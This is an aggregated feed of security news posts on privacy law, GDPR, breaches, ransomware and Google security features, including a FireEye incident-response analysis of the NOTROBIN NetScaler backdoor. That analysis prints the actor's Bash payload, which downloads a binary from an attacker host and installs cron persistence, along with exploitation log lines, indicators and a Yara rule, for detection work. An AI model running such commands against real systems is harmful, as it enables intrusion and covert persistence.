Following a series of “blue screens of death” (BSoDs) on a medical company’s network, researchers identified a cryptominer that spread to more than 800 machines in just a couple months. The payload, a Monero miner, was hidden within a WAV file that was able to migrate undetected to various systems before executing the payload itself. To spread efficiently, the infection used the long-patched EternalBlue exploit that had not yet been updated on the network in question, thus leaving them fully susceptible to attack.

Consulting Firm Exposes Professional Data

Thousands of business professionals from the UK have potentially fallen victim to a data leak by the major consulting firm CHS. A server belonging to the company was found to contain passports, tax info, and other sensitive information that could have been archived from background checks within an unsecured Amazon Web Services bucket. While it is still unclear how long the data was available, researchers who discovered the leak quickly contacted both CERT-UK and Amazon directly, which promptly secured the server.

Western Australian Bank Breached

Over the last week officials for P&N Bank in Australia have been contacting their customers concerning a data breach that occurred during a server upgrade in early December. Though personally identifiable information has been exposed, it doesn’t appear that any accounts have been illicitly accessed and relates more to a customer’s contact information. A total number of affected customers has yet to be confirmed.

The post Cyber News Rundown: Ryuk Uses Wake-on-Lan appeared first on Webroot Blog.

What Website Owners Should Know About Terms and Conditions

All website owners should consider terms and conditions (T&Cs) to be a form of legal protection as they establish the responsibility and rights of the involved parties. T&Cs provide full security should anything go amiss and they also help you settle any disputes quickly without having to resort to the courts.

Is it a legal requirement to include T&Cs?
No, but it’s always best to include terms and conditions on your website as they will enable you to reduce your potential liabilities. It is essential that you let your customers or visitors know about their rights; if you’re not clear about your policies, they may dispute matters such as cancellation options, item returns and other rights, putting your company at a disadvantage. Additionally, if areas are unclear in your terms and conditions or even not mentioned, it may mean that you are liable to give your customer additional rights than are given under statutory.
Do you have to include GDPR provisions?
Website owners, even those outside the European Union (EU), should also consider incorporating the General Data Protection Regulation. Inserting a data protection clause can reassure your customers that their data will not be used for inappropriate purposes. You can include the majority of the GDPR obligations in your site’s privacy policy.

What should you include in the T&Cs?
If you are an online seller, it is essential to explain to customers the various processes involved, such as:
  • How to make a purchase
  • How to make a payment
  • How they will receive their products
  • How they can cancel orders
T&Cs help you establish boundaries by outlining what specific rights customers have. In return, you also inform them about your obligations as a seller and the limits of your legal liability.

What kind of protection can you expect from the T&Cs? It may not be uncommon for disputes to arise between you and your online customers or visitors. Therefore, it is essential to ensure that the terms and conditions are accessible, preferably on your website.

You also need to protect your website from copyright infringements. You can avoid potential disputes and confusion by specifying which sections are copyrighted and which are your intellectual property. You should also stipulate what visitors can do with your data. If there is any breach of your copyright or intellectual property, the terms and conditions should clearly explain how the problem will be resolved.

Are there standard T&Cs which apply to all websites?
There are general formats or templates of T&Cs that you can obtain for free online. However, there is always the possibility that these documents will not cover specific aspects of your business or will not include the relevant terms. If you omit an essential term from your website, you may find yourself vulnerable if a dispute arises. Therefore, it is critical that you customise your terms and conditions so they are suitable for your website and business.
  • Product and service offerings – No two businesses are alike, even if you sell the same products and services. For example, your competitor may only accept PayPal but you may allow other modes of payment.
  • Industry or target audience – In every industry, there are specific provisions that need to be included in the T&Cs. For example, customers may have a legal right to cancel or return their purchases within a specified period.
Can website owners enforce their T&Cs?
Your T&Cs are like any other enforceable contract. Nevertheless, you must ensure that they don’t contravene existing consumer laws or government regulations. Remember, you should only incorporate clauses that you can legally apply.

Conclusion
Terms and conditions are necessary for all businesses, including e-commerce sites. It is essential that you create T&Cs that are suitable for your products and services, and that they are legally enforceable. You also need to periodically review your T&Cs, especially if there have been any significant changes to your business structure or the law. Moreover, they must be accessible to your online customers and visitors. If they are not aware of your T&Cs, you may find it difficult to enforce them if a problem arises.

Written by Kerry Gibbs, a legal expert at BEB Contract and Legal Services.

2020 Trend Alert: Consumer Privacy

Consumer privacy

We are only a few weeks into 2020, and it is safe to say that consumer privacy is all the rage. California kicked off the movement with the California Consumer Privacy Act (CCPA), AB 375, which went into effect on January 1, 2020. The act aims to give consumers more rights to their personal data. Since then, Washington, New Hampshire, and New York have all proposed similar consumer privacy bills that ??? if passed ??? will have an effect not only on consumers, but on also on businesses that operate in these states.

Take a look at the bills, then consider the steps your business can take to help comply with the regulations.

California Consumer Privacy Act

The newly established rights allow consumers to request records of what personal data is collected and mandate the deletion or cease the sale of that information. The privacy act also regulates the data collected from minors and prevents businesses from discriminating against consumers that choose to exercise their rights.

Businesses that must adhere to the CCPA are those that collect personal data, conduct business in California, and fit into one or more of the following categories:

  • Gross annual revenue over $25 million
  • Buys, sells, or obtains the personal data of more than 50,000 consumers, devices, or households
  • Makes over 50 percent of its revenue from selling consumers??? data. 

To further empower consumers, CCPA has also mandated data brokers to register with the Attorney General, providing information about who they are and what their collection practices entail. This information is loaded into a database and is accessible to all consumers. 

Washington Privacy Act

On January 13, 2020, Washington State Senator, Reuven Carlyle, introduced the bill for the Washington Privacy Act (WPA), SB 5376. If granted, the bill will allow residents to see who is accessing their personal data, correct or delete data, or opt-out of targeted advertisements and profiling. Controllers will need to conduct data protection assessments regarding where they are processing personal data and additional assessments anytime there is a change to the processing that could affect consumers. The bill will also require companies to disclose data management policies to increase transparency and establish limits on the use of facial recognition technology.

New Hampshire Privacy Act

Garrett Muscatel and Greg Indruk, U.S. State Representatives, reintroduced the bill for the Act Relative to the Collection of Personal Information by Businesses, HB 1680, to the New Hampshire House of Representatives. The bill, if passed, will give consumers the right to access, transfer, and delete their personal information, or deny the sale of such information. It will also give consumers the right to take action if their information is leaked. Like CCPA, the bill would apply to any legal entity that has annual gross revenues over $25,000,000, processes data of more than 50,000 New Hampshire consumers, or derives 50 percent of its revenue from selling personal information.

New York Privacy Act

The New York Privacy Act, SB 5642, was sent to the Senate Standing Committee on Consumer Protection on January 8, 2020. If approved, the bill will improve transparency, add protection, and allow for action against personal data. Personal data will include biometric information and internet or electric network activity.

What steps can you take to protect your clients and your business?

These regulations, and others, like the EU GDPR, signal that protecting and securing consumer data will increasingly be required, and application security plays a role in that requirement. Whether you are looking to expand your application security (AppSec) program to further comply with the new regulations, or you are looking to start your first AppSec program, we can help. Our Veracode Verified program gives you a clear AppSec roadmap to follow, helping to ensure that security is weaved into your development process.

In addition, by participating in the program, you can earn a Veracode Verified seal, which demonstrates to customers that you are dedicated to securing your applications and protecting their personal data.

Contact us today to learn how to better secure your applications to comply with industry standards.

NIST Releases Version 1.0 of Privacy Framework

Our data-driven society has a tricky balancing act to perform: building innovative products and services that use personal data while still protecting people’s privacy. To help organizations keep this balance, the National Institute of Standards and Technology (NIST) is offering a new tool for managing privacy risk. The agency has just released Version 1.0 of the NIST Privacy Framework: A Tool for Improving Privacy through Enterprise Risk Management. Developed from a draft version in collaboration with a range of stakeholders, the framework provides a useful set of privacy protection

Israeli spyware firm fails to get hacking case dismissed

Judge orders NSO Group to fight case brought by Saudi activist and pay his legal costs

An Israeli judge has rejected an attempt by the spyware firm NSO Group to dismiss a case brought against it by a prominent Saudi activist who alleged that the company’s cyberweapons were used to hack his phone.

The decision could add pressure on the company, which faces multiple accusations that it sold surveillance technology, named Pegasus, to authoritarian regimes and other governments that have allegedly used it to target political activists and journalists.

Continue reading...

I’m still on Windows 7 – what should I do?

Support for Windows 7 has ended, leaving Marcy wondering how they can protect themselves

I do a lot of work on a Windows 7 desktop PC that is about five years old. I’m a widow and can’t afford to run out and get a new PC at this time, or pay for Windows 10. If I do stay with Windows 7, what should I worry about, and how can I protect myself? I have been running Kaspersky Total Security for several years, which has worked well so far. Marcy

Microsoft Windows 7 – launched in 2009 – came to the end of its supported life on Tuesday. Despite Microsoft’s repeated warnings to Windows 7 users, there may still be a couple of hundred million users, many of them in businesses. What should people do next?

Continue reading...

404 Exploit Not Found: Vigilante Deploying Mitigation for Citrix NetScaler Vulnerability While Maintaining Backdoor

As noted in Rough Patch: I Promise It'll Be 200 OK, our FireEye Mandiant Incident Response team has been hard at work responding to intrusions stemming from the exploitation of CVE-2019-19781. After analyzing dozens of successful exploitation attempts against Citrix ADCs that did not have the Citrix mitigation steps implemented, we’ve recognized multiple groups of post-exploitation activity. Within these, something caught our eye: one particular threat actor that’s been deploying a previously-unseen payload for which we’ve created the code family NOTROBIN.

Upon gaining access to a vulnerable NetScaler device, this actor cleans up known malware and deploys NOTROBIN to block subsequent exploitation attempts! But all is not as it seems, as NOTROBIN maintains backdoor access for those who know a secret passphrase. FireEye believes that this actor may be quietly collecting access to NetScaler devices for a subsequent campaign.

Initial Compromise

This actor exploits NetScaler devices using CVE-2019-19781 to execute shell commands on the compromised device. They issue an HTTP POST request from a Tor exit node to transmit the payload to the vulnerable newbm.pl CGI script. For example, Figure 1 shows a web server access log entry recording exploitation:

127.0.0.2 - - [12/Jan/2020:21:55:19 -0500] "POST
/vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 304 - "-" "curl/7.67.0"

Figure 1: Web log showing exploitation

Unlike other actors, this actor appears to exploit devices using a single HTTP POST request that results in an HTTP 304 response—there is no observed HTTP GET to invoke staged commands. Unfortunately, we haven’t recovered the POST body contents to see how it works.  In any case, exploitation causes the Bash one liner shown in Figure 2 to run on the compromised system:

pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k
hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o
/tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo "* * * * *
/var/nstmp/.nscache/httpd" | crontab -; /tmp/.init/httpd &"

Figure 2: Bash exploit payload

This is the same methodology as described in Rough Patch: I Promise It'll Be 200 OK. The effects of this series of commands includes:

  1. Kill and delete all running instances of netscalerd—a common process name used for cryptocurrency mining utilities deployed to NetScaler devices.
  2. Creates a hidden staging directory /tmp/.init, download NOTROBIN to it, and enable the execute permission.
  3. Install /var/nstmp/.nscache/httpd for persistence via the cron daemon. This is the path to which NOTROBIN will copy itself.
  4. Manually execute NOTROBIN.

There’s a lot to unpack here. Of note, the actor removes malware known to target NetScaler devices via the CVE-2019-19781 vulnerability. Cryptocurrency miners are generally easy to identify—just look for the process utilizing nearly 100% of the CPU. By uninstalling these unwanted utilities, the actor may hope that administrators overlook an obvious compromise of their NetScaler devices.

The actor uses curl to fetch NOTROBIN from the hosting server with IP address 95.179.163[.]186 that appears to be an abandoned WordPress site. FireEye has identified many payloads hosted on this server, each named after their embedded authentication key. Interestingly, we haven’t seen reuse of the same payload across multiple clients. Compartmenting payloads indicates the actor is exercising operational security.

FireEye has recovered cron syslog entries, such as those shown in Figure 3, that confirm the persistent installation of NOTROBIN. Note that these entries appear just after the initial compromise. This is a robust indicator of compromise to triage NetScaler devices.

Jan 12 21:57:00 <cron.info> foo.netscaler /usr/sbin/cron[73531]:
(nobody) CMD (/var/nstmp/.nscache/httpd)

Figure 3: cron log entry showing NOTROBIN execution

Now, let’s turn our attention to what NOTROBIN does.

Analysis of NOTROBIN

NOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically scans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to block exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that NOTROBIN provides backdoor access to the compromised system.

When executed, NOTROBIN ensures that it is running from the path /var/nstmp/.nscache/httpd. If not, the utility copies itself to this path, spawns the new copy, and then exits itself. This provides detection cover by migrating the process from /tmp/, a suspicious place for long-running processes to execute, to an apparently NetScaler-related, hidden directory.

Now the fun begins: it spawns two routines that periodically check for and delete exploits.

Every second, NOTROBIN searches the directory /netscaler/portal/scripts/ for entries created within the last 14 days and deletes them, unless the filename or file content contains a hardcoded key (example: 64d4c2d3ee56af4f4ca8171556d50faa). Open source reporting indicates that some actors write scripts into this directory after exploiting CVE-2019-19781. Therefore, we believe that this routine cleans the system of publicly known payloads, such as PersonalBookmark.pl.

Eight times per second, NOTROBIN searches for files with an .xml extension in the directory /netscaler/portal/templates/. This is the directory into which exploits for CVE-2019-19781 write templates containing attacker commands. NOTROBIN deletes files that contain either of the strings block or BLOCK, which likely match potential exploit code, such as that found in the ProjectZeroIndia exploit; however, the utility does not delete files with a filename containing the secret key.

FireEye believes that actors deploy NOTROBIN to block exploitation of the CVE-2019-19781 vulnerability while maintaining backdoor access to compromised NetScaler devices. The mitigation works by deleting staged exploit code found within NetScaler templates before it can be invoked. However, when the actor provides the hardcoded key during subsequent exploitation, NOTROBIN does not remove the payload. This lets the actor regain access to the vulnerable device at a later time.

Across multiple investigations, FireEye observed actors deploying NOTROBIN with unique keys. For example, we’ve recovered nearly 100 keys from different binaries. These look like MD5 hashes, though FireEye has been unsuccessful in recovering any plaintext. Using complex, unique keys makes it difficult for third parties, such as competing attackers or FireEye, to easily scan for NetScaler devices “protected” by NOTROBIN. This actor follows a strong password policy!

Based on strings found within NOTROBIN, the actor appears to inject the key into the Go project using source code files named after the key. Figure 4 and Figure 5 show examples of these filenames.

/tmp/b/.tmpl_ci/64d4c2d3ee56af4f4ca8171556d50faa.go

Figure 4: Source filename recovered from NOTROBIN sample

/root/backup/sources/d474a8de77902851f96a3b7aa2dcbb8e.go

Figure 5: Source filename recovered from NOTROBIN sample

We wonder if “tmpl_ci” refers to a Continuous Integration setup that applies source code templating to inject keys and build NOTROBIN variants. We also hope the actor didn’t have to revert to backups after losing the original source!

Outstanding Questions

NOTROBIN spawns a background routine that listens on UDP port 18634 and receives data; however, it drops the data without inspecting it. You can see this logic in Figure 6. FireEye has not uncovered a purpose for this behavior, though DCSO makes a strong case for this being used as a mutex, as only a single listener can be active on this port.


Figure 6: NOTROBIN logic that drops UDP traffic

There is also an empty function main.install_cron whose implementation has been removed, so alternatively, perhaps these are vestiges of an early version of NOTROBIN. In any case, a NetScaler device listening on UDP port 18634 is a reliable indicator of compromise. Figure 7 shows an example of listing the open file handles on a compromised NetScaler device, including a port listening on UDP 18634.


Figure 7: File handling listing of compromised NetScaler device

NOTROBIN Efficacy

During one engagement, FireEye reviewed forensic evidence of NetScaler exploitation attempts against a single device, both before and after NOTROBIN was deployed by an actor. Prior to January 12, before NOTROBIN was installed, we identified successful attacks from multiple actors. But, across the following three days, more than a dozen exploitation attempts were thwarted by NOTROBIN. In other words, NOTROBIN inoculated the vulnerable device from further compromise. For example, Figure 8 shows a log message that records a failed exploitation attempt.

127.0.0.2 - - [13/Jan/2020:05:09:07 -0500] "GET
/vpn/../vpns/portal/wTyaINaDVPaw8rmh.xml HTTP/1.1" 404 48 "-"
"curl/7.47.0"

Figure 8: Web log entry showing a failed exploitation attempt

Note that the application server responded with HTTP 404 (“Not Found”) as this actor attempts to invoke their payload staged in the template wTyaINaDVPaw8rmh.xml. NOTROBIN deleted the malicious template shortly after it was created – and before it could be used by the other actor.

FireEye has not yet identified if the actor has returned to NOTROBIN backdoors.

Conclusion

FireEye believes that the actor behind NOTROBIN has been opportunistically compromising NetScaler devices, possibly to prepare for an upcoming campaign. They remove other known malware, potentially to avoid detection by administrators that check into their devices after reading Citrix security bulletin CTX267027. NOTROBIN mitigates CVE-2019-19781 on compromised devices but retains a backdoor for an actor with a secret key. While we haven’t seen the actor return, we’re skeptical that they will remain a Robin Hood character protecting the internet from the shadows.

Indicators of Compromise and Discovery

Table 1 lists indicators that match NOTROBIN variants that FireEye has identified. The domain vilarunners[.]cat is the WordPress site that hosted NOTROBIN payloads. The domain resolved to 95.179.163[.]186 during the time of observed activity. As of January 15, the vilarunners[.]cat domain currently resolves to a new IP address of 80.240.31[.]218.

IOC Item

Value

HTTP URL prefix

hxxps://95[.]179.163.186/wp-content/uploads/2018/09/

Directory

/var/nstmp/.nscache

Filename

/var/nstmp/.nscache/httpd

Directory

/tmp/.init

Filename

/tmp/.init/httpd

Crontab entry

/var/nstmp/.nscache/httpd

Listening UDP port

18634

Remote IP

95.179.163[.]186

Remote IP

80.240.31[.]218

Domain

vilarunners[.]cat

Table 1: Indicators of Compromise

Discovery on VirusTotal

You can use the following VTI queries to identify NOTROBIN variants on VirusTotal:

  • vhash:"73cee1e8e1c3265c8f836516c53ae042"
  • vhash:"e57a7713cdf89a2f72c6526549d22987"

Note, the vHash implementation is private, so we’re not able to confirm why this technique works. In practice, the vHashes cover the same variants identified by the Yara rule listed in Figure 9.

rule NOTROBIN

{

    meta:

        author = "william.ballenthin@fireeye.com"

        date_created = "2020-01-15"

    strings:

        $func_name_1 = "main.remove_bds"

        $func_name_2 = "main.xrun"

    condition:

        all of them

}

Figure 9: Yara rule that matches on NOTROBIN variants

Recovered Authentication Keys

FireEye has identified nearly 100 hardcoded keys from NOTROBIN variants that the actor could use to re-enter compromised environments. We expect that these strings may be found within subsequent exploitation attempts, either as filenames or payload content. Although we won’t publish them here out of concern for our customers, please reach out if you’re looking for NOTROBIN within your environment and we can provide a list.

Acknowledgements

Thank you to analysts across FireEye that are currently responding to this activity, including Brandan Schondorfer for collecting and interpreting artifacts, Steven Miller for coordinating analysis, Evan Reese for pivoting across intel leads, Chris Glyer for reviewing technical aspects, Moritz Raabe for reverse engineering NOTROBIN samples, and Ashley Frazer for refining the presentation and conclusions.

Testing Servers for Vulnerability to HTTP Desync Request Smuggling Attacks

A widespread vulnerability is allowing attackers to steal credentials, route victims to malicious URLs, and preventing users from using the targeted websites. The attack tricks the back-end server into splicing the content of an attacker’s malicious request into the content of the victim’s request. This allows attackers to control part of a normal user’s requests. Several companies, including PayPal and Akamai, have paid tens of thousands of dollars in bug bounties to white hat hackers who identified this vulnerability in their systems.

GDPR Checklist For Small Businesses

The new General Data Protection Regulations (GDPR) which came into effect in 2018 meant some big changes in the way businesses collect and handle personal data. The idea behind the new legislation is to give individuals better access and control over their own personal data. While this is great news for individuals, it requires a little extra work from businesses who must now provide legal grounds for collecting data and must only use it for the intended purpose. What’s more, they need to follow these regulations to the letter and remain GDPR compliant at all times.

This applies to companies of all sizes – even your small business. If you collect personal data in any form, such as emails, addresses, names or financial details, your business needs to be GDPR compliant. If it’s found that you’re not effectively managing and protecting your data you could face a big fine. Though regulators may be a bit more lenient with smaller businesses depending on how much data you hold, an unwanted fine is always bad news. That’s why we’ve put together this checklist to help ensure your small business is GDPR compliant. In this guide we’ll look at:

  • Understanding your data and responsibilities
  • Defining your data consent policy
  • Access requests and disposing of old data
  • Setting up a data storage and security policy
  • Training all staff on GDPR
  • Creating data processing notices

  1. Understanding your data and responsibilities

In order to be GDPR compliant it’s important that you understand what data you’re collecting and your responsibilities as a business. It’s therefore a good idea to get clued up on what is defined as ‘personal data’ and set out strict guidelines on how much information you need to collect. This is because a huge part of GDPR is ensuring that you only collect personal information you actually need and that it is only used for the intended purpose. The less you collect the easier it is to stay compliant.

You’ll also want to ensure anyone that is involved in the handling of data understands how to collect and store the data effectively, as well as how to process it in line with GDPR. As you collect data, it’s a good idea to keep a note of how consent is being obtained and what processes the data goes through once it has been collected.

 

  1. Setting out your data consent policy

Getting clear and explicit consent from individuals to collect and use their data is one of the most important aspects of GDPR. For this reason, you need to outline to customers or those using your services why you’re collecting their data and how you intend to use it in the future. Once they have actively agreed, you can then collect their data – this is usually done through sign-up forms or pop-ups. However, if they do not give you permission then under no circumstances should you record their personal information.

You must be able to show that they have obtained consent for all the data that you have collected. Otherwise, you run the risk of being fined. Another point worth noting is that you can no longer rely on underhand tactics such as pre-ticked boxes to gain consent. This is now illegal under GDPR and can land you in trouble. Finally, you must make it easy for individuals to opt-out of receiving your communications. The best way to do this is by adding an unsubscribe button at the bottom of all emails.

 

  1. Access requests and disposing of old data

If you haven’t already, GDPR states that you must get re-permission from customers whose information you held before the new guidelines were implemented in May 2018. If they do not give you their consent once again or they do not reply to your email at all, you must delete their data as soon as possible. An important part of your GDPR checklist should be getting auditing processes in place that determine how long you will store data. For example, if a customer has not engaged with your brand in 12 months it is no longer necessary to keep their information and it should therefore be deleted.

What’s more, as part of GDPR every EU individual has the right to access their data. Therefore you need a system in place to deal with access requests. You’ll have 30 days from receiving the request to provide them with an electronic copy of all the information you have on them. They can also request that this be deleted, so you need a system in place to get this done as quickly as possible.

 

  1. Setting up a data storage and security policy

GDPR is set out to protect the rights and personal information of individuals, therefore you need to make sure you’re taking care of the data you’re collecting. This means knowing where it is stored and ensuring you’ve got the security measures in place to keep it safe. Mapping out all the places where you store data, be that email, databases or cloud-based systems, makes it easier to find and deal with access or deletion requests. Your storage and security policy should outline where everything is stored, how it is protected and who has access to said data.

You also need to know how data is being transferred and the flow of information around your business. This stops information seemingly getting lost or falling into the wrong hands. It also pays to have a system in place just in case your hardware is accessed or lost, whilst containing sensitive information. For example, if a laptop full of information is misplaced, having the data encrypted means you’re less likely to fall victim to a breach or face a fine.

 

  1. Training all staff on GDPR

Most data breaches or security mistakes come as a result of human error. But unfortunately, in this case ignorance isn’t bliss, you cannot use ignorance as an excuse for mishandling data. For this reason, it’s important that all members of your team are clued up on GDPR, their personal responsibilities for looking after personal data, and how to recognise a breach. As part of GDPR, you must report any data breaches within 72 hours, this becomes much easier if everyone in your team is educated on what this looks like and who they need to report to.

 

  1. Creating data processing notices

Finally, data handling needs to be a clear and transparent process and therefore it’s a good idea to create a notice to explain how your business collects and processes data. This is often called a Fair Processing Notice and can be sent out to customers/users as well as being displayed somewhere on your website. It should outline how you capture, use and store data, as well as giving instructions on how an individual can make and access or deletion request. This helps them to understand how you are protecting their data and can be great for building your reputation as a legitimate and caring business.

 

The post GDPR Checklist For Small Businesses appeared first on CyberDB.

Have an iPhone? Use it to protect your Google Account with the Advanced Protection Program



Phishing—when an online attacker tries to trick you into giving them your username and password—is one of the most common causes of account compromises. We recently partnered with The Harris Poll to survey 500 high-risk users (politicians and their staff, journalists, business executives, activists, online influencers) living in the U.S. Seventy-four percent of them reported having been the target of a phishing attempt or compromised by a phishing attack.

Gmail automatically blocks more than 100 million phishing emails every day and warns people that are targeted by government-backed attackers, but you can further strengthen the security of your Google Account by enrolling in the Advanced Protection Program—our strongest security protections that automatically help defend against evolving methods attackers use to gain access to your personal and work Google Accounts and data.

Security keys are an important feature of the Advanced Protection Program, because they provide the strongest protection against phishing attacks. In the past, you had to separately purchase and carry physical security keys. Last year, we built security keys into Android phones—and starting today, you can activate a security key on your iPhone to help protect your Google Account.

Activating the security key on your iPhone with Google’s Smart Lock app

Security keys use public-key cryptography to verify your identity and URL of the login page, so that an attacker can’t access your account even if they have your username or password. Unlike other two-factor authentication (2FA) methods that try to verify your sign-in, security keys are built with FIDO standards that provide the strongest protection against automated bots, bulk phishing attacks, and targeted phishing attacks. You can learn more about security keys from our Cloud Next ‘19 presentation.


Approving the sign-in to a Google Account with Google’s SmartLock app on an iPhone

On your iPhone, the security key can be activated with Google’s Smart Lock app; on your Android phone, the functionality is built in. The security key in your phone uses Bluetooth to verify your sign-in on Chrome OS, iOS, macOS and Windows 10 devices without requiring you to pair your devices. This helps protect your Google Account on virtually any device with the convenience of your phone.

How to get started

Follow these simple steps to help protect your personal or work Google Account today:
  • Activate your phone’s security key (Android 7+ or iOS 10+)
  • Enroll in the Advanced Protection Program
  • When signing in to your Google Account, make sure Bluetooth is turned on on your phone and the device you’re signing in on.
We also highly recommend registering a backup security key to your account and keeping it in a safe place, so you can get into your account if you lose your phone. You can get a security key from a number of vendors, including Google, with our own Titan Security Key.

If you’re a Google Cloud customer, you can find out more about the Advanced Protection Program for the enterprise on our G Suite Updates blog.

Here’s to stronger account security—right in your pocket.

NIST Requesting Information to Upgrade the iEdison System

The National Institute of Standards and Technology (NIST) plans to begin modernizing the Interagency Edison System (iEdison) by using feedback and insights from the 32 agencies that currently use the older platform. NIST will launch the redesigned iEdison as a digital, governmental tool for the 21st century under the guidance of the Lab-to-Market cross agency priority goal and the White House’s Office of Science and Technology Policy and by focusing on advancing the President’s Management Agenda. The original iEdison platform was created in 1995 and hosted by the National Institute of Health

Advisory 2020-002: Critical Vulnerabilities for Microsoft Windows Announced, Patch Urgently

On 15 January 2020 (AEDT), Microsoft released security patches for three critical and one important vulnerabilities in the Microsoft Remote Desktop Client, Remote Desktop Gateway and the Windows operating system. The ACSC recommends that users of these products apply patches urgently to prevent malicious actors from using these vulnerabilities to compromise your network.

Microsoft rolls out Windows 10 security fix after NSA warning

US agency revealed flaw that could be exploited by hackers to create malicious software

Microsoft is rolling out a security fix to Windows 10 after the US National Security Agency (NSA) warned the popular operating system contained a highly dangerous flaw that could be used by hackers. Reporting the vulnerability represents a departure for the NSA from its past strategy of keeping security flaws under wraps to exploit for its own intelligence needs.

The NSA revealed during a press conference on Tuesday that the “serious vulnerability” could be used to create malicious software that appeared to be legitimate. The flaw “makes trust vulnerable”, the NSA director of cybersecurity, Anne Neuberger, said in a briefing call to media on Tuesday.

Related: Skype audio graded by workers in China with 'no security measures'

Continue reading...

Securing open-source: how Google supports the new Kubernetes bug bounty



At Google, we care deeply about the security of open-source projects, as they’re such a critical part of our infrastructure—and indeed everyone’s. Today, the Cloud-Native Computing Foundation (CNCF) announced a new bug bounty program for Kubernetes that we helped create and get up and running. Here’s a brief overview of the program, other ways we help secure open-source projects and information on how you can get involved.

Launching the Kubernetes bug bounty program

Kubernetes is a CNCF project. As part of its graduation criteria, the CNCF recently funded the project’s first security audit, to review its core areas and identify potential issues. The audit identified and addressed several previously unknown security issues. Thankfully, Kubernetes already had a Product Security Committee, including engineers from the Google Kubernetes Engine (GKE) security team, who respond to and patch any newly discovered bugs. But the job of securing an open-source project is never done. To increase awareness of Kubernetes’ security model, attract new security researchers, and reward ongoing efforts in the community, the Kubernetes Product Security Committee began discussions in 2018 about launching an official bug bounty program.

Find Kubernetes bugs, get paid

What kind of bugs does the bounty program recognize? Most of the content you’d think of as ‘core’ Kubernetes, included at https://github.com/kubernetes, is in scope. We’re interested in common kinds of security issues like remote code execution, privilege escalation, and bugs in authentication or authorization. Because Kubernetes is a community project, we’re also interested in the Kubernetes supply chain, including build and release processes that might allow a malicious individual to gain unauthorized access to commits, or otherwise affect build artifacts. This is a bit different from your standard bug bounty as there isn’t a ‘live’ environment for you to test—Kubernetes can be configured in many different ways, and we’re looking for bugs that affect any of those (except when existing configuration options could mitigate the bug). Thanks to the CNCF’s ongoing support and funding of this new program, depending on the bug, you can be rewarded with a bounty anywhere from $100 to $10,000.

The bug bounty program has been in a private release for several months, with invited researchers submitting bugs and to help us test the triage process. And today, the new Kubernetes bug bounty program is live! We’re excited to see what kind of bugs you discover, and are ready to respond to new reports. You can learn more about the program and how to get involved here.

Dedicated to Kubernetes security

Google has been involved in this new Kubernetes bug bounty from the get-go: proposing the program, completing vendor evaluations, defining the initial scope, testing the process, and onboarding HackerOne to implement the bug bounty solution. Though this is a big effort, it’s part of our ongoing commitment to securing Kubernetes. Google continues to be involved in every part of Kubernetes security, including responding to vulnerabilities as part of the Kubernetes Product Security Committee, chairing the sig-auth Kubernetes special interest group, and leading the aforementioned Kubernetes security audit. We realize that security is a critical part of any user’s decision to use an open-source tool, so we dedicate resources to help ensure we’re providing the best possible security for Kubernetes and GKE.

Although the Kubernetes bug bounty program is new, it isn’t a novel strategy for Google. We have enjoyed a close relationship with the security research community for many years and, in 2010, Google established our own Vulnerability Rewards Program (VRP). The VRP provides rewards for vulnerabilities reported in GKE and virtually all other Google Cloud services. (If you find a bug in GKE that isn’t specific to Kubernetes core, you should still report it to the Google VRP!) Nor is Kubernetes the only open-source project with a bug bounty program. In fact, we recently expanded our Patch Rewards program to provide financial rewards both upfront and after-the-fact for security improvements to open-source projects.

Help keep the world’s infrastructure safe. Report a bug to the Kubernetes bug bounty, or a GKE bug to the Google VRP.

Travelex says it won’t pay ransom to crooks as currency chaos continues

While most of us spent New Year’s Eve celebrating, the IT department at Travelex was grappling with a ransomware virus that was spreading through its systems.

Almost two weeks on, the currency exchange service is finally starting to restore its internal systems, having been forced to take its website offline and suspend many of its operations.

Employees have been forced to work with pen and paper, severely delaying the few processes that could still be performed, while several UK banks that work with the company have had to turn away customers who wanted to order foreign banknotes.

A Royal Bank of Scotland representative said: “We are currently unable to accept any travel money orders either online, in branch or by telephone due to issues with our travel-money supplier, Travelex.

“We apologise for any inconvenience caused.”

Lloyds and Barclays have issued similar statements, causing huge problems for people across the country who are looking to convert their pounds into foreign currency.


What is ransomware?

Ransomware is a specific type of malware that encrypts computer files, essentially locking the owner out of their systems.

The ransomware will then display a message demanding that the victim make a payment to regain access.

Criminals generally plant malware on victims’ computers by hiding it in an attachment contained within a phishing email.


Why not just pay the ransom?

Many ransomware victims feel obliged to pay up, because it’s the quickest way to get back to business.

However, experts generally urge organisations not to negotiate, because payments help fuel the cyber crime industry and there’s no guarantee that meeting the criminals’ demands will put the infected organisation in a better position.

For example, there’s the possibility that the cyber criminals will up the ransom demand if you try to negotiate, or that they won’t keep their word once you’ve paid.

There have also been cases where the ransomware has contained bugs that make it impossible to decode the data once you’ve received the decryption key.

You should also acknowledge that buying your freedom will only solve one small problem. Your IT team will still have to spend hours – if not days – restoring your systems, and you’ll still face the repercussions of massive delays.

That’s why experts say it’s better to use the money to get straight to your recovery. You’ll have the moral victory of fighting off cyber criminals – demonstrating in the process that it’s not worth targeting you again in the future – while also approaching the situation proactively.


See also:


Proactivity is essential when it comes to security incidents, because you’ll need to prove that you’ve considered the risks and have a response plan.

This is equally important for employees, who should feel that management has the situation under control, as it is for the ICO (Information Commissioner’s Office), which regulates GDPR (General Data Protection Regulation) compliance in the UK.

A further problem Travelex faces is that it didn’t report the incident to the ICO when it was first infected. And remember, it’s still a data breach if cyber criminals are locking you out of your systems rather than stealing sensitive data. That’s because a data breach is classed as anything that affects the confidentiality, integrity or availability of information.

Ransomware attack can also develop into ‘traditional’ data breaches if the criminals are able to access information from the locked systems. The criminal hackers in this case have claimed to have done that by siphoning off 5 GB of data from Travelex’s databases.

Preventing ransomware attacks

It’s impossible to avoid the risk of ransomware altogether, because there are so many ways that cyber criminals can target you.

However, as the majority of infections are the result of malicious attachments in phishing emails, you can eradicate your biggest threat by training employees to spot suspicious messages.

You can give them the tools they need by enrolling them on our phishing and ransomware e-learning course.

